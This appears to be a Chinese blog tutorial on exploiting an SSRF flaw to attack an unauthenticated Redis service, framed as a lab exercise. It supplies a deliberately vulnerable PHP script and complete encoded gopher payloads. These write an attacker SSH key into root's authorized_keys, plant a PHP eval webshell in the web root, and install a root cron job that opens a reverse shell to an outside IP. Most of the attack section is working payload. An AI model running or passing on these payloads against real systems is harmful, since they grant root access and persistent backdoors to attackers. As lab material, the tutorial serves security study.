前置知识
利用SSRF来攻击靶机的redis服务,需要涉及到的一些知识点:
1,Redis客户端和服务端通信过程,以及常用命令;
2,相关协议,例如dict://协议和gother协议的使用
dict://协议
词典网络协议,在RFC 2009中进行描述。它的目标是超越Webster protocol,并允许客户端在使用过程中访问更多字典。Dict服务器和客户机使用TCP端口2628
利用dict协议可以扫描开放的端口,探测指纹信息,可以攻击redis服务
用法:
dict://ip:port/info
gother://协议
gother协议:分布式文档传递服务。利用该服务,用户可以无缝地浏览、搜索和检索驻留在不同位置的信息。
gopher协议支持发出GET、POST请求:可以先截获get请求包和post请求包,再构造成符合gopher协议的请求。gopher协议是ssrf利用中一个最强大的协议
用法:
gopher://ip:port/_payload
结合redis未授权访问漏洞的知识,可以参考:
我们知道利用redist未授权访问漏洞主要有以下三种姿势:
1,redis写入ssh公钥,获取操作系统权限;
2,直接向Web目录中写webshell;
3,linux计划任务执行命令反弹shell。
这里同样是利用这三种姿势,通过SSRF来攻击Redis。
实验环境搭建
1,Redis的搭建和配置,参照:
redis未授权访问漏洞详解
安装好以后i,靶机上执行命令,打开redis服务:
redis-server /etc/redis.conf
2,靶机上搭建WEB环境,在网站根目录,放置存在SSRF漏洞的脚本;
ssrf.php
代码如下:
<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_GET['url']);
#curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
#curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
curl_exec($ch);
curl_close($ch);
?>
然后访问漏洞环境:
http://10.1.8.159/ssrf.php?url=www.baidu.com
当访问http://10.1.8.159/ssrf.php?url=127.0.0.1时,可以发现,url未对内部地址做过滤,存在SSRF漏洞:
探测redis默认端口6379:
http://10.1.8.159/ssrf.php?url=dict://127.0.0.1:6379/info
可以发现,靶机上的redis服务信息。
SSRF攻击Redis
通过redis写入ssh公钥,获取操作系统权限;
当redis以root身份运行,可以给root账户写入SSH公钥文件,直接通过SSH登录目标服务器。
首先在靶机中创建ssh公钥存放目录(一般是/root/.ssh)
mkdir /root/.ssh
靶机中开启redis服务
redis-server /etc/redis.conf
在攻击机中生成ssh公钥和私钥,密码设置为空:
ssh-keygen -t rsa
进入.ssh目录,然后将生成的公钥写入 ceshi.txt 文件
cd /root/.ssh
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") >ceshi.txt
然后在.ssh目录,可以看到ceshi.txt中已经保存了公钥:
通过URL访问SSRF漏洞地址:http://10.1.8.159/ssrf.php?url=
结合gother协议构造符合格式的paylod,从而模拟redis通信。
http://10.1.8.159/ssrf.php?url=gother://127.0.0.1:6379/_payload
转换为:
http://10.1.8.159/ssrf.php?url=gopher%3a%2f%2f127.0.0.1%3a6379%2f_payload
正常是在redis客户端和服务端连接通信时,payload如下:
set margin "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDPXsD2dKIK4u8NVt0n702dmwjMzM0TOFbuIGVqBO/CXUJs6a3X00Hn1MQgd4v/au1+2MsQUhWwmVjAYrZfo/hyzMLjjdbb8F5NQ/MuX+XCQPXr0OIMOIQ8uOJQEDvow/FF8YLlbp6u9iQlyRMSCQE3dDbfkt5TWPXGiQxIqTO8gTCSO/clat6zsnlJ9Gab14tlGpv78rlQ8lKCLrmLojknO+64ikwIXNB/iB4R0SYthRm9GLV07kK2ZM2QBjmO1YQxdfBelNIcgQLQqG0iCPX5nf4BdPEVwGnJJHpAo32DaTbPs5q9ABitImNR5d2sd6RhAsle63IixDVn1oIKiOClXWkeyRZViBE87hddRynKs23pW+ENDojXK/4A3j4V8rqsfRVearpIoAEK+hbm7UDT6y9Sf533cH/xfdY01u0YOAnnDvMNt8QYgsJE4PWbnxl35ogEk0VLbBnogvvnH+rWmkSAyxXQvMiLMiEAqGkhEIOHTsTSps/tQjMmbd3RhnM= root@luodameinv\n\n\n"
config set dir /root/.ssh/
config set dbfilename "authorized_keys"
save
//更改redis备份路径为ssh公钥存放目录(一般默认为/root/.ssh)并设置上传公钥的备份文件名字为authorized_keys,将一开始生成的SSH公钥,即ceshi.txt里面的内容写入authorized_keys文件中。
将以上命令构造成符合gother协议格式,且能够通过URL传输的格式来发送,需要经过如下步骤:
将payload进行url编码,替换%0a为%0d%0a,然后再重复一次以上的两个步骤,
(原因:替换回车换行为%0d%0a,HTTP包最后加%0d%0a`代表消息结束)
得到的结果,替代http://10.1.8.159/ssrf.php?url=gopher%3a%2f%2f127.0.0.1%3a6379%2f_payload里面payload的位置得到:
完整payload如下:
http://10.1.8.159/ssrf.php?url=gopher%3a%2f%2f127.0.0.1%3a6379%2f_%25%37%33%25%36%35%25%37%34%25%32%30%25%32%30%25%36%64%25%36%31%25%37%32%25%36%37%25%36%39%25%36%65%25%32%30%25%32%30%25%32%32%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%37%33%25%37%33%25%36%38%25%32%64%25%37%32%25%37%33%25%36%31%25%32%30%25%34%31%25%34%31%25%34%31%25%34%31%25%34%32%25%33%33%25%34%65%25%37%61%25%36%31%25%34%33%25%33%31%25%37%39%25%36%33%25%33%32%25%34%35%25%34%31%25%34%31%25%34%31%25%34%31%25%34%34%25%34%31%25%35%31%25%34%31%25%34%32%25%34%31%25%34%31%25%34%31%25%34%32%25%36%37%25%35%31%25%34%34%25%35%30%25%35%38%25%37%33%25%34%34%25%33%32%25%36%34%25%34%62%25%34%39%25%34%62%25%33%34%25%37%35%25%33%38%25%34%65%25%35%36%25%37%34%25%33%30%25%36%65%25%33%37%25%33%30%25%33%32%25%36%34%25%36%64%25%37%37%25%36%61%25%34%64%25%37%61%25%34%64%25%33%30%25%35%34%25%34%66%25%34%36%25%36%32%25%37%35%25%34%39%25%34%37%25%35%36%25%37%31%25%34%32%25%34%66%25%32%66%25%34%33%25%35%38%25%35%35%25%34%61%25%37%33%25%33%36%25%36%31%25%33%33%25%35%38%25%33%30%25%33%30%25%34%38%25%36%65%25%33%31%25%34%64%25%35%31%25%36%37%25%36%34%25%33%34%25%37%36%25%32%66%25%36%31%25%37%35%25%33%31%25%32%62%25%33%32%25%34%64%25%37%33%25%35%31%25%35%35%25%36%38%25%35%37%25%37%37%25%36%64%25%35%36%25%36%61%25%34%31%25%35%39%25%37%32%25%35%61%25%36%36%25%36%66%25%32%66%25%36%38%25%37%39%25%37%61%25%34%64%25%34%63%25%36%61%25%36%61%25%36%34%25%36%32%25%36%32%25%33%38%25%34%36%25%33%35%25%34%65%25%35%31%25%32%66%25%34%64%25%37%35%25%35%38%25%32%62%25%35%38%25%34%33%25%35%31%25%35%30%25%35%38%25%37%32%25%33%30%25%34%66%25%34%39%25%34%64%25%34%66%25%34%39%25%35%31%25%33%38%25%37%35%25%34%66%25%34%61%25%35%31%25%34%35%25%34%34%25%37%36%25%36%66%25%37%37%25%32%66%25%34%36%25%34%36%25%33%38%25%35%39%25%34%63%25%36%63%25%36%32%25%37%30%25%33%36%25%37%35%25%33%39%25%36%39%25%35%31%25%36%63%25%37%39%25%35%32%25%34%64%25%35%33%25%34%33%25%35%31%25%34%35%25%33%33%25%36%34%25%34%34%25%36%32%25%36%36%25%36%62%25%37%34%25%33%35%25%35%34%25%35%37%25%35%30%25%35%38%25%34%37%25%36%39%25%35%31%25%37%38%25%34%39%25%37%31%25%35%34%25%34%66%25%33%38%25%36%37%25%35%34%25%34%33%25%35%33%25%34%66%25%32%66%25%36%33%25%36%63%25%36%31%25%37%34%25%33%36%25%37%61%25%37%33%25%36%65%25%36%63%25%34%61%25%33%39%25%34%37%25%36%31%25%36%32%25%33%31%25%33%34%25%37%34%25%36%63%25%34%37%25%37%30%25%37%36%25%33%37%25%33%38%25%37%32%25%36%63%25%35%31%25%33%38%25%36%63%25%34%62%25%34%33%25%34%63%25%37%32%25%36%64%25%34%63%25%36%66%25%36%61%25%36%62%25%36%65%25%34%66%25%32%62%25%33%36%25%33%34%25%36%39%25%36%62%25%37%37%25%34%39%25%35%38%25%34%65%25%34%32%25%32%66%25%36%39%25%34%32%25%33%34%25%35%32%25%33%30%25%35%33%25%35%39%25%37%34%25%36%38%25%35%32%25%36%64%25%33%39%25%34%37%25%34%63%25%35%36%25%33%30%25%33%37%25%36%62%25%34%62%25%33%32%25%35%61%25%34%64%25%33%32%25%35%31%25%34%32%25%36%61%25%36%64%25%34%66%25%33%31%25%35%39%25%35%31%25%37%38%25%36%34%25%36%36%25%34%32%25%36%35%25%36%63%25%34%65%25%34%39%25%36%33%25%36%37%25%35%31%25%34%63%25%35%31%25%37%31%25%34%37%25%33%30%25%36%39%25%34%33%25%35%30%25%35%38%25%33%35%25%36%65%25%36%36%25%33%34%25%34%32%25%36%34%25%35%30%25%34%35%25%35%36%25%37%37%25%34%37%25%36%65%25%34%61%25%34%61%25%34%38%25%37%30%25%34%31%25%36%66%25%33%33%25%33%32%25%34%34%25%36%31%25%35%34%25%36%32%25%35%30%25%37%33%25%33%35%25%37%31%25%33%39%25%34%31%25%34%32%25%36%39%25%37%34%25%34%39%25%36%64%25%34%65%25%35%32%25%33%35%25%36%34%25%33%32%25%37%33%25%36%34%25%33%36%25%35%32%25%36%38%25%34%31%25%37%33%25%36%63%25%36%35%25%33%36%25%33%33%25%34%39%25%36%39%25%37%38%25%34%34%25%35%36%25%36%65%25%33%31%25%36%66%25%34%39%25%34%62%25%36%39%25%34%66%25%34%33%25%36%63%25%35%38%25%35%37%25%36%62%25%36%35%25%37%39%25%35%32%25%35%61%25%35%36%25%36%39%25%34%32%25%34%35%25%33%38%25%33%37%25%36%38%25%36%34%25%36%34%25%35%32%25%37%39%25%36%65%25%34%62%25%37%33%25%33%32%25%33%33%25%37%30%25%35%37%25%32%62%25%34%35%25%34%65%25%34%34%25%36%66%25%36%61%25%35%38%25%34%62%25%32%66%25%33%34%25%34%31%25%33%33%25%36%61%25%33%34%25%35%36%25%33%38%25%37%32%25%37%31%25%37%33%25%36%36%25%35%32%25%35%36%25%36%35%25%36%31%25%37%32%25%37%30%25%34%39%25%36%66%25%34%31%25%34%35%25%34%62%25%32%62%25%36%38%25%36%32%25%36%64%25%33%37%25%35%35%25%34%34%25%35%34%25%33%36%25%37%39%25%33%39%25%35%33%25%36%36%25%33%35%25%33%33%25%33%33%25%36%33%25%34%38%25%32%66%25%37%38%25%36%36%25%36%34%25%35%39%25%33%30%25%33%31%25%37%35%25%33%30%25%35%39%25%34%66%25%34%31%25%36%65%25%36%65%25%34%34%25%37%36%25%34%64%25%34%65%25%37%34%25%33%38%25%35%31%25%35%39%25%36%37%25%37%33%25%34%61%25%34%35%25%33%34%25%35%30%25%35%37%25%36%32%25%36%65%25%37%38%25%36%63%25%33%33%25%33%35%25%36%66%25%36%37%25%34%35%25%36%62%25%33%30%25%35%36%25%34%63%25%36%32%25%34%32%25%36%65%25%36%66%25%36%37%25%37%36%25%37%36%25%36%65%25%34%38%25%32%62%25%37%32%25%35%37%25%36%64%25%36%62%25%35%33%25%34%31%25%37%39%25%37%38%25%35%38%25%35%31%25%37%36%25%34%64%25%36%39%25%34%63%25%34%64%25%36%39%25%34%35%25%34%31%25%37%31%25%34%37%25%36%62%25%36%38%25%34%35%25%34%39%25%34%66%25%34%38%25%35%34%25%37%33%25%35%34%25%35%33%25%37%30%25%37%33%25%32%66%25%37%34%25%35%31%25%36%61%25%34%64%25%36%64%25%36%32%25%36%34%25%33%33%25%35%32%25%36%38%25%36%65%25%34%64%25%33%64%25%32%30%25%37%32%25%36%66%25%36%66%25%37%34%25%34%30%25%36%63%25%37%35%25%36%66%25%36%34%25%36%31%25%36%64%25%36%35%25%36%39%25%36%65%25%37%36%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%32%32%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%39%25%37%32%25%32%30%25%32%66%25%37%32%25%36%66%25%36%66%25%37%34%25%32%66%25%32%65%25%37%33%25%37%33%25%36%38%25%32%66%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%32%32%25%36%31%25%37%35%25%37%34%25%36%38%25%36%66%25%37%32%25%36%39%25%37%61%25%36%35%25%36%34%25%35%66%25%36%62%25%36%35%25%37%39%25%37%33%25%32%32%25%30%64%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35
然后直接在浏览器中访问,或者在kaili中执行
curl 完整payload
虽然页面显示超时,但是最后还是成功写入ssh公钥到靶机。
然后在攻击机上使用ssh免密登录靶机:
ssh -i id_rsa root@10.1.8.159
直接向Web目录中写webshell;
和上面同理:
http://10.1.8.159/ssrf.php?url=gother://127.0.0.1:6379/_payload
转换格式:
http://10.1.8.159/ssrf.php?url=gopher%3a%2f%2f127.0.0.1%3a6379%2f_payload
payload:
set x "\n\n\n<?php @eval($_POST['redis']);?>\n\n\n"
config set dir /www/admin/localhost_80/wwwroot
config set dbfilename shell.php
save
以上命令,实现了向网站根目录写入一句话木马shell.php的功能 dir视具体网站路径而定。
分别二次URL编码,期间替换%0a为%0d%0a,得到的结果,替代http://10.1.8.159/ssrf.php?url=gopher%3a%2f%2f127.0.0.1%3a6379%2f_payload里面payload的位置得到:
完整payload:
http://10.1.8.159/ssrf.php?url=gopher%3a%2f%2f127.0.0.1%3a6379%2f_%25%37%33%25%36%35%25%37%34%25%32%30%25%37%38%25%32%30%25%32%32%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%33%63%25%33%66%25%37%30%25%36%38%25%37%30%25%32%30%25%34%30%25%36%35%25%37%36%25%36%31%25%36%63%25%32%38%25%32%34%25%35%66%25%35%30%25%34%66%25%35%33%25%35%34%25%35%62%25%32%37%25%37%32%25%36%35%25%36%34%25%36%39%25%37%33%25%32%37%25%35%64%25%32%39%25%33%62%25%33%66%25%33%65%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%32%32%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%39%25%37%32%25%32%30%25%32%66%25%37%37%25%37%37%25%37%37%25%32%66%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65%25%32%66%25%36%63%25%36%66%25%36%33%25%36%31%25%36%63%25%36%38%25%36%66%25%37%33%25%37%34%25%35%66%25%33%38%25%33%30%25%32%66%25%37%37%25%37%37%25%37%37%25%37%32%25%36%66%25%36%66%25%37%34%25%32%30%25%32%30%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%37%33%25%36%38%25%36%35%25%36%63%25%36%63%25%32%65%25%37%30%25%36%38%25%37%30%25%30%64%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35
直接访问,(因为是get请求)
虽然显示连接超时,但是发现靶机网站根目录已经成功写入了shell.php文件:
使用菜刀,连接http://10.1.8.159/shell.php一句话木马:
成功获得webshell。
linux计划任务执行命令反弹shell。
VPS监听需要反弹shell的端口:
crontab命令格式:
参照:
https://www.runoob.com/w3cnote/linux-crontab-tasks.html
redis下的payload:
set xxx "\n\n* * * * * bash -i>& /dev/tcp/104.168.147.13/6666 0>&1\n\n"
config set dir /var/spool/cron
config set dbfilename root
save
//该命令实现了:创建一个/var/spool/cron目录下的root用户的定时任务,每一分钟执行一次反弹shell的命令。
分别进行二次URL编码,期间替换%0a为%0d%0a,并按照之前的方式构造得到:
最终的payload:
http://10.1.8.159/ssrf.php?url=gopher%3a%2f%2f127.0.0.1%3a6379%2f_%25%37%33%25%36%35%25%37%34%25%32%30%25%37%38%25%37%38%25%37%38%25%32%30%25%32%32%25%35%63%25%36%65%25%35%63%25%36%65%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%36%32%25%36%31%25%37%33%25%36%38%25%32%30%25%32%64%25%36%39%25%33%65%25%32%36%25%32%30%25%32%66%25%36%34%25%36%35%25%37%36%25%32%66%25%37%34%25%36%33%25%37%30%25%32%66%25%33%31%25%33%30%25%33%34%25%32%65%25%33%31%25%33%36%25%33%38%25%32%65%25%33%31%25%33%34%25%33%37%25%32%65%25%33%31%25%33%33%25%32%66%25%33%36%25%33%36%25%33%36%25%33%36%25%32%30%25%33%30%25%33%65%25%32%36%25%33%31%25%35%63%25%36%65%25%35%63%25%36%65%25%32%32%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%39%25%37%32%25%32%30%25%32%66%25%37%36%25%36%31%25%37%32%25%32%66%25%37%33%25%37%30%25%36%66%25%36%66%25%36%63%25%32%66%25%36%33%25%37%32%25%36%66%25%36%65%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%37%32%25%36%66%25%36%66%25%37%34%25%30%64%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35
直接访问,成功获得反弹shell:
查看靶机,可以看到写入的反弹shell的计划任务:
以上就是利用ssrf攻击redis服务的主要内容,
3282
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
